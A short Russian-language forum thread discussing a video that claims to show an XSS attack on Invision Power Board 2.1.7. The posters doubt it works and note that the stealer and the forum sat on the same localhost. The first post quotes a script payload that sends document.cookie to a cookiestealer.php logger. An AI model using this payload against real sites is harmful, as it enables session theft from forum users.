Недавно на одном из зарубежных порталов скачал видео по демонстрации xss на ipb 2.1.7 Код темы форума хекера был такой Code: [урлl=http://путь к гиф файлу][имг]просто картинка][/имг] Gif файл Code: <SCRIPT>location.href='http://127.0.0.1/cookiestealer.php?cookie='+escape(document.cookie)</SCRIPT> После обращения к линку у хекеря в логах осталась его сессия.Как такое возможно,если в линке в теме топика не передается документ.куки а те куки что уже в гиф файле будут куки не с форума? Попробовал на локалхосте,естествено,нулевой результат ) Кому интересно могу даю линк на видео,но в отличие от нас,у них размеры видео начиная с 30 мегов и выше http://rapidshare.de/files/33563512/Video_4_Hacking-Truths.NeT.rar.html Ну ведь бред да?
Ты серьёзно или это прикол? Если серьёзно, тогда сколькие из них повелись на это? Ещё-бы куки не записались, стилер с форумом и картинкой на одном хосте(127.0.0.1).
[урлl=http://путь к гиф файлу][имг]просто картинка][/имг] тут тег урл не закрыт, может на основе "перекрытия" тегов че было, а в гифке код скорее всего куда нить подключается, либо это чейто шутка...посмотри видео еще раз внимательно, 30метров качать не тема